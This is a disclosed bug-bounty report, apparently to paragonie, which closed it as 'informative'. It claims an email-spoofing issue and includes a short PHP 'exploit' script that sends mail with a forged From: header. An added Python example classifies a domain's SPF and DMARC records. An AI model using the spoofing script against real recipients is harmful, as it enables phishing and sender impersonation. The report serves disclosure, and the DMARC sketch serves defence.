Email spoofing in [email protected]

Disclosed: 2016-07-01 22:44:22 By ahsan To paragonie
Unknown
Vulnerability Details
Hey, I've found an *email spoofing* vulnerability in [email protected]

Issue:
========

When I try to send a fake email from [email protected] it is an issue; because, fake mails should be sent into the 'spam' folder.

### Exploit Code:

```
<?php
$to = "[email protected]";
$subject = "test by ahsan";
$txt = "testing";
// The From: header is supplied by the sender and is not verified by mail()
$headers = "From: [email protected]";
mail($to, $subject, $txt, $headers);
?>
```

When I tried to run it as a web app in my browser, like, I created a file on my server (e.g. test.php) and in that file I put this exploit code, and saved it. When I ran it like myserver.com/test.php it showed a blank white page, and next I checked my email and I received an email from [email protected] in my **inbox** saying 'testing'.

I hope you'll fix it soon.. :-)

Thanks,
Ahsan Tahir
Report Stats
  • Report ID: 148763
  • State: Closed
  • Substate: informative
  • Upvotes: 2
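
A domain owner's view of the report above, as an added example that is not part of the original report or the vendor's code: whether receivers are asked to quarantine or reject mail carrying a forged `From:` header depends on the DMARC policy the domain publishes, with SPF as one of its inputs. The sketch below classifies a domain from its TXT records; the function names and all sample records are constructed for illustration.

```python
# Added example: constructed TXT records, not any real domain's DNS.
SPF_MECH_ALL = {"all": "+", "+all": "+", "-all": "-", "~all": "~", "?all": "?"}

def parse_tags(record):
    """Split 'v=DMARC1; p=none' into a dict of lowercase tag -> value."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    return tags

def spf_all_qualifier(txt_records):
    """Qualifier of the SPF 'all' mechanism ('+', '-', '~', '?') or None."""
    for rec in txt_records:
        terms = rec.lower().split()
        if terms and terms[0] == "v=spf1":
            for term in terms[1:]:
                if term in SPF_MECH_ALL:
                    return SPF_MECH_ALL[term]
            return None  # SPF record without 'all': implicit neutral result
    return None  # no SPF record published

def assess(spf_txt, dmarc_txt):
    """Classify how a forged From: header for this domain would be treated."""
    tags = next((parse_tags(r) for r in dmarc_txt
                 if r.strip().lower().startswith("v=dmarc1")), None)
    policy = tags.get("p") if tags else None
    pct = tags.get("pct", "100") if tags else "100"
    pct = int(pct) if pct.isdigit() else 100
    if policy in ("quarantine", "reject"):
        verdict = "enforced" if pct >= 100 else "partial"
    elif policy == "none":
        verdict = "monitor-only"   # reports only, no action requested
    else:
        verdict = "no-dmarc"       # receivers fall back to local heuristics
    return {"spf_all": spf_all_qualifier(spf_txt), "dmarc_policy": policy,
            "verdict": verdict}

if __name__ == "__main__":
    samples = {
        "no DMARC, soft SPF": (["v=spf1 include:_spf.example.net ~all"], []),
        "monitoring only": (["v=spf1 mx -all"], ["v=DMARC1; p=none"]),
        "enforced": (["v=spf1 mx -all"], ["v=DMARC1; p=reject; pct=100"]),
    }
    for label, (spf, dmarc) in samples.items():
        print(label, "->", assess(spf, dmarc))
```

In practice the two lists would come from TXT lookups on the domain and on its `_dmarc` subdomain.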